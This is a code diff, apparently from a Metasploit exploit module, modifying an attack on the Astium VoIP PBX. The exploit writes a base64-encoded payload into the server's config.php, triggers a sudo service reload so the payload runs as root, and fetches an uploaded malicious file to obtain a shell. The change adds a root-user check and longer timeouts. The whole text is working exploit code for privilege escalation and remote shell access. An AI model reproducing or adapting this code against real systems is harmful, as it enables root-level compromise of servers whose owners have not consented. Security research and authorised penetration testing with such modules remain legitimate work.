@@ -136,12 +136,13 @@ def exploit
136136 phppayload = "<?php "
137137 # Make backup of the "/usr/local/astium/web/php/config.php" file
138138 phppayload << "$orig = file_get_contents('/usr/local/astium/web/php/config.php');"
139- # Add the payload to the end of "/usr/local/astium/web/php/config.php"
140- phppayload << "$replacement = $orig . base64_decode(\" #{ Rex ::Text . encode_base64 ( payload . encoded ) } \" );"
139+ # Add the payload to the end of "/usr/local/astium/web/php/config.php". Also do a check if we are root,
140+ # else during the config reload it might happen that an extra shell is spawned as the apache user.
141+ phppayload << "$replacement = base64_decode(\" #{ Rex ::Text . encode_base64 ( payload . encoded ) } \" );"
141142 phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');"
142- phppayload << "fwrite($f, $replacement);"
143+ phppayload << "fwrite($f, $orig . \" <?php if (posix_getuid() == 0) { \" . $ replacement . \" } ?> \" );"
143144 phppayload << "fclose($f);"
144- # Reload astcfgd using sudo (so it will read our payload with root privileges)
145+ # Reload astcfgd using sudo (so it will read our payload with root privileges).
145146 phppayload << "system('sudo /sbin/service astcfgd reload');"
146147 # Sleep 1 minute, so that we have enough time for the reload to trigger our payload
147148 phppayload << "sleep(60);"
@@ -174,11 +175,11 @@ def exploit
174175 register_file_for_cleanup ( "/usr/local/astium/web/html/upload/#{ payload_name } )
175176
176177 print_status ( "#{ peer } #{ uri } #{ payload_name } )
177- print_status ( "#{ peer } 1 minute as the reloading process may take some time" )
178+ print_status ( "#{ peer } , this may take a couple of minutes " )
178179 res = send_request_cgi ( {
179180 'method' => 'GET' ,
180181 'uri' => normalize_uri ( uri , "upload" , "#{ payload_name } )
181- } , 60 )
182+ } , 120 )
182183
183184 # If we don't get a 200 when we request our malicious payload, we suspect
184185 # we don't have a shell, either.
0 commit comments